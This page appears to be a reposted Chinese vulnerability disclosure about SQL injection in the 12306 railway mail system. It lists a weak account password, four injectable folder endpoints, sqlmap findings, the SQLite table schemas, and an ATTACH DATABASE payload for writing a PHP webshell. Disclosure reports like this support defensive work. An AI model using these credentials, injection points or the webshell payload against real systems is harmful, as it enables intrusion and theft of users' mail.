频道栏目
首页 > 资讯 > 网站安全 > 正文

12306官方邮箱系统深度SQL注入漏洞至少4处

16-02-02        来源:[db:作者]  
收藏   我要投稿

不要想着看标题能找到漏洞,别费劲了!
下载的tangscan的插件,好厉害!

下载的tangscan的插件检测到的
 

a3.jpg



http://mail.12306.cn/app/mail/entry

邮箱弱口令:

zhangyong/123456
 

0.png



本想看看上传的地方有没有问题,结果只发现了SQL注入
 

a1.png


 

a2.png


 

http://mail.12306.cn
post:
/app/simple/mail/Folder/list/Sent/0/20*
/app/simple/mail/Folder/list/Draft/0/20*
/app/simple/mail/Folder/list/Spam/0/20*
/app/simple/mail/Folder/list/Trash/0/20*
这4处应该都是SQL注入点



注入点空格需要替换成%20,不然就404

扔sqlmap,结果注入点类型是:SQLite,有点意思
 

1.png


 

2.png



5个表的结果如下:
 

mail:
mtbno,mno,fno,new,size,time,dele,attach,mid,reply,mfrom,mto,subject,brief
folder:
fno,folder,sum,count,new,last
searchmail:
session,sno,mtbno,mno,fno,time
sqlite_sequence:
name,seq
search:
session,sno,time,count,name,value



SQLite出数据的方式不太一样,换个姿势--sql-shell

简单读几条数据证明危害
 

3.png


 

4.png


 

5.png


 

6.png



查了下,SQLite这玩意可以直接写shell,但是需要知道网站路径,不玩了

shell方式:

ATTACH DATABASE '$PATH\\shell.php' AS pwn; CREATE TABLE pwn.exp(dataz text); INSERT INTO pwn.exp(dataz)VALUES('');--

 

解决方案:

好不容易抢到回家的票!

俺是良民

相关TAG标签
上一篇:长虹某站命令执行进入企业大内网(影响数十台主机安全)+发现已被入侵过留有多个后门文件
下一篇:雅客e家快捷酒店某管理系统弱口令(可导致17万会员资料外泄)
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站